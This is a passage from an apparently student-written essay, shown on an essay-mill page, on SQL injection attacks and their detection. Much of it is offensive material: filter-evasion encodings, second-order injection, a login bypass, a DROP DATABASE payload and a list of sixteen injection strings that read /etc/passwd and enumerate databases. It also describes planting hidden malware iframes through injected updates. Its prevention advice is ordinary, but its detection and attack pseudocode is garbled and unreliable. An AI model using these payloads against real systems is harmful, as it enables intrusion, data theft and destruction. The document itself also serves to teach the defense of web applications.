SQL Injection Attack and detection using hybrid Algorithm 5

SQL Injection Attack and detection using hybrid Algorithm

5. How to Avoid Detection & Bypass Defenses
White Space:
The first method we can use to try to evade signature detection utilizes white space. Adding extra spaces or special characters like tabs or new lines won’t affect the SQL statement, but could potentially get malicious payloads through filters. For example:
SELECT * FROM Users WHERE id =1
This statement will execute exactly the same as:
SELECT * FROM Users WHERE id=1
A tab character or new line will also not affect the statement:
SELECT * FROM Users WHERE id=1

We Will Write a Custom Essay Specifically
For You For Only $13.90/page!


order now

Null Bytes:
Often, the filter will block certain characters from being executed in the SQL statement. This is probably the most common way attacks are thwarted since, without special characters like apostrophes or dashes, injection is unlikely to be successful.
One way to get around this is by using null bytes (%00) in front of any blocked characters. For instance, if we know that the application is blocking apostrophes, the following injection could be used to trick the filter into allowing them:
%00′ or 1=1–

URL Encoding:
Another way to avoid detection is by using URL encoding. This type of encoding is used to send web address information over the internet via HTTP. Since URLs can only contain ASCII values, any invalid characters need to be encoded to valid ASCII characters. URLs also cannot include spaces, so they are usually converted to a + sign or %20. By masking a malicious SQL query using URL encoding, it is possible to bypass filters. Take the following injection for example:
‘ or 1=1–
Using URL encoding it would look like:
%27%20or%201%3D1–

Character Encoding:
Character encoding works similarly to hex encoding in that characters in the original SQL statement are replaced with converted values. This type of encoding uses the CHAR() function to encode characters as decimal values.
SELECT * FROM Users WHERE name=’admin’–
Using character encoding, the statement would look like:
SELECT * FROM Users WHERE name=CHAR(97,100,109,105,110)–

String Concatenation:

We can often avoid detection by breaking up keywords in the malicious SQL query. Keep in mind that string concatenation varies between different database systems. Let’s look at the following statement:
SELECT * FROM Users WHERE id=1
Utilizing string concatenation in MySQL, we can craft a query that could potentially evade filters:
CONCAT(‘SEL’, ‘ECT’) * FROM Users WHERE id=1
Here is what the query would look like in MS SQL:
‘SEL’ + ‘ECT’ * FROM Users WHERE id=1

Comments:

busing the way that SQL handles inline comments can also aid in bypassing filters and avoiding detection when performing SQL injection attacks. Since there can be any number of comments in a statement and still be valid, we can use them to break up the query and possibly circumvent any filters that are present. For instance, we can insert comments in between keywords like so:
SELECT/**/*/**/FROM/**/Users/**/WHERE/**/name/**/=/**/’admin’–

Combinations:
Sometimes, even these signature evasion techniques will not be successful on their own, but we can combine them to further our chances of successfully bypassing defenses and completing an attack. For example, let’s say a filter on the application we are attacking doesn’t allow comment characters. To get around this, we can try crafting a query that encodes these characters in an effort to trick the filter into allowing them. The original query that fails:
SELECT/**/*/**/FROM/**/Users/**/WHERE/**/name/**/=/**/’admin’–
The same query using URL encoding to mask the comment characters:
SELECT%2F%2A%2A%2F%2A%2F%2A%2A%2FFROM%2F%2A%2A%2FUsers%2F%2A%2A%2FWHERE%2F%2A%2A%2Fname%2F%2A%2A%2F%3D%2F%2A%2A%2F%E2%80%99admin%E2%80%99–
Any of these methods can be combined to help get around pesky filters, and as such, this greatly increases our chances of success when performing SQL injection.
Second Order Injection:
Second Order SQL injection occurs when a web application or database properly filters input from a user but fails to provide any further sanitation after the initial query is passed through and validated. When the application performs some other function utilizing the database, our SQL query is executed dynamically and the malicious code is run. As such, this type of injection can be thought of as having two distinct stages: the initial query which encapsulates the malicious code and another process that executes the code at a later time.
A common mitigation technique is to double up any single quotes that appear within user input before the query is ran against the database. Let’s suppose we have an application that offers users the ability to create an account, as well as a password reset function. When we create an account, the SQL query could look something like this:
INSERT INTO Users (username, password) VALUES (‘johndoe”’, ‘hunter2’)
This causes no problems for the database since once the single quotes are doubled up, it is still a valid statement. Now let’s suppose we would like to change our password. The query sent to the database would look like this:
SELECT password FROM Users WHERE username=’johndoe”
Since the value for the username stored in the database is the string ‘johndoe’ an SQL injection flaw is now present because the original input is no longer being filtered. In order to exploit this, all we would have to do is register a username containing malicious code, such as:
UNION ALL SELECT * FROM Users WHERE username=’admin’–
The account creation itself will be handled successfully, but when we go to change the password the malicious query will be executed, thus bypassing input validation.
6. SQL Injection Attack Patterns and Examples:
Here’s an example of how a SQL injection attack could be carried out in practice. The attack is designed to gain access to all data about a user from the database table USERS without knowing a user name or matching password. The SQL application code might be:
SELECT * FROM Users WHERE Username=’$username’ AND Password=’$password’
Using a web interface, when prompted for their username and password, an attack might enter:
1′ OR ‘1’ = ‘1 and
1’ OR ‘1’ = ‘1
By entering this deliberately formulated username and password pair, the attacker has effectively injected two whole OR conditions into the authentication process. Let’s take a closer look to see how. The SQL application code was expecting a simple text string such as joebloggs for the username, and another simple string such as password123 for the password. It would then parse the line:
SELECT * FROM Users WHERE Username=’$username’ AND Password=’$password’ as
SELECT * FROM Users WHERE Username=’joebloggs’ AND Password=’password123
and access the data for a user joebloggs (if there is one) if the password for that user is password123.
But here’s the problem. What the application was not expecting was that an attacker would enter a username and password formulated in this way, with a clever use of apostrophes. The result is that the query is parsed as:
SELECT * FROM Users WHERE Username=’1′ OR ‘1’ = ‘1’ AND Password=’1′ OR ‘1’ = ‘1’
Now the application will access data for any user if their password is 1 or if 1=1. And since the condition 1=1 is always true, this SQL query will always result in the password authentication process being bypassed.
(Code sample sourced from OWASP)
In the SQL injection example above, the two OR conditions are injected when the application was expecting a username and password string, but an attack could just as well inject a database command such as DROP DATABASE, which results in the loss of all the information stored in a database. For example, imagine a database application that enables an employee to enter their name into one field, and a number such as a social security number into the next field, and stores this information in a database called socsecnumbers. The application will likely have a form with some code behind it to accept a name in the form ’employeename’. A malicious employee (or outside attacker) might be able to carry out a SQL injection attack that causes the application to execute the SQL command DROP DATABASE socsecnumbers, which results in the deletion and complete loss of the information stored in that database. To do so, instead of entering Joe Bloggs, the attacker could enter the name Joe Bloggs’); DROP DATABASE socsecnumbers; — ? resulting in the application understanding:
‘Joe Bloggs’); DROP DATABASE socsecnumbers; — ?’
The key part of this attack is, again, the malicious use of an apostrophe. The result of this ‘ character after Joe Bloggs is that the database thinks it has finished receiving the name it is expecting. Since more characters have been entered, it decides they should be interpreted as SQL code. The ); means that the following statement should be executed immediately, so the database executes a DROP DATABASE socsecnumbers command.
There will still be a trailing ‘ in the code that has not been used, so to prevent that being a problem the name entered by the attacker ends with ;– because the ; means carry on executing the next part of the name, and — tells the database to give up on that line because the rest of the statement should be treated as a comment.

Few of the SQL control codes are discussed below which can be used to find out the SQL database information:
1) A ‘ or ‘ ‘ = ‘
2) ‘or ‘a’ = ‘a
3)%’ or ‘0’=’0
4)%’ and 1=0 table_name from information_schema.tables#
5) 1′ or 1=1#
6) ‘UNION SELECT NULL, @@hostname#
7) ‘UNION SELECT NULL, load_file(‘/etc/passwd’)#
8) A ‘or ‘=’
9) 1 or 1=1
10) no_one password ‘or ‘ ‘ =’
11) admin’ or 5=5# to bypass login page
12) ‘UNION SELECT user(), database()#
13) ‘UNION SELECT 1.version()#
14) ‘or EXISTS(SELECT 1 FROM dual WHERE database() LIKE ‘%C%’) AND “=’ gives column names
15) ‘OR 1 ORDER BY 1– –
If there are 4 columns in the database, then ‘OR 1 ORDER BY 5– – will give error, So number of columns can be known
16) ‘OR 1 UNION SELECT 1,2,3,4– – for 4 columns, to display column information

7. Why Are SQL Injection Attacks So Successful?
SQL Injection attacks are so successful for a few reasons, the most common of which is that many newer developers simply don’t know about the problem. With project timelines being so short, these junior developers don’t have the time to research the security implications of using dynamic SQL. These applications then get left in production for months or years, with little to no maintenance. These developers can then move through their career without anyone giving them the guidance needed to prevent these problems. Now developers aren’t solely to blame for SQL Injection attack problems. The IT Management should have policies in place in order to ensure that newer developers that come in don’t have the ability to write dynamic inline SQL against the database engine
7.1 Cleaning Up the Database After an SQL Injection Attack
There are a few different attacks that an attacker can perform against an SQL Server database. As shown so far in this chapter, delete commands can be passed into the SQL engine. However, other commands can be executed as well. Usually, attackers don’t want to delete data or take a system offline; they instead want to use the SQL database to help launch other attacks. A simple method is to identify tables and columns that are used to display data on the website that uses the database as a backend. Then extra data is included in the columns of the database, which will allow attacking code to be executed against the database. This can be done using an update statement that puts an HTML iframe tag into each row of a table. This way when customers view the website, they get the iframe put into their web browser, which could be set to a height of 0 so that it isn’t visible. This hidden iframe could then install viruses or spyware on the user’s computer without their knowledge.

8. Preventive measures against SQL Injection Attacks:
a) User input should always be sanitized before it is used in dynamic SQL statements, it should never be trusted.
b) Stored Procedures can encapsulate the SQL statements and treat all input as parameters.
c) Prepared Statements to work by creating the SQL statement first then treating all submitted user data as parameters.
d) Regular expressions can also be used to detect potential harmful code and remove it befor e executing the SQL statements.
e) Only necessary access rights should be given to accounts used to connect the database, restrict access to database objects and functionality, according to the Principle of Least Privilege.
f) Error messages and warnngs should not reveal sensitive information and where exactly an error occurred and database names
g) Validation should be based on a whitelistlist: accept only data fitting a specified stucture, rather than reject bad patterns.Check for Data Type, Size, Range, Format, Expected values
h) Instead of concatenating strings, use secure database components such as stored procedures, parameterized queries, and object bindings for commands and even better solution is to use an ORM library, such as EntityFramework, Hibernate, or iBatis.
i) All database calls should be parameterized instead of being inline dynamic SQL.

9. Algorithms:
1. Detecting vulnerable Input in Form Field:
keyword = {“select”, “union”, “delete”, “update”, “from”, “drop”}
special character = {“*”,”‘”,”—”,”#”,”;”,”,”,”)”,”(“,”=”}
Boolean = { “and”,”or”,”&”,”|”}
Pattern = { keyword*, special character*, Boolean*, digit*}*
begin
flag = safe
If len(input) ;1 :

If input == pattern And
If input xor pattern ==0 :
Flag = unsafe
If flag ==unsafe:
Input is vulnerable
End

2. Attack Algorithm:
Input: Enter url in browser or through program
Output: Web page is vulnerable/ safe
Begin
If FF is empty and onsubmit(FF)gives MySql Error
Print web page is vulnerable
If FF is NE and FF(Pattern) and onsubmit(FF) gives MySql Error
Print webpage is vulnerable
While(!Complete Db)
OP ?FF(Pattern)
Print OP
Else
check for Blind SQli